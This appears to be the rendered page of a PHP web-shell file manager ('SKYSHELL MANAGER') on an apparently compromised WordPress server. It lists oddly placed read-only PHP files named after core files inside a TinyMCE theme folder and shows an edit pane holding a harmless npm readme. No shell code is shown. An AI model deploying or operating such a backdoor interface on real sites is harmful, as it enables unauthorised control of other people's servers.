📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: readme.md
# set-immediate-shim [](https://travis-ci.org/sindresorhus/set-immediate-shim) > Simple [`setImmediate`](https://developer.mozilla.org/en-US/docs/Web/API/Window/setImmediate) [ponyfill](https://ponyfill.com) ## Install ``` $ npm install set-immediate-shim ``` ## Usage ```js const setImmediateShim = require('set-immediate-shim'); setImmediateShim(() => { console.log('2'); }); console.log('1'); //=> 1 //=> 2 ``` ## Related - [p-immediate](https://github.com/sindresorhus/p-immediate) - Returns a promise resolved in the next event loop - think `setImmediate()` ## License MIT © [Sindre Sorhus](https://sindresorhus.com)
Save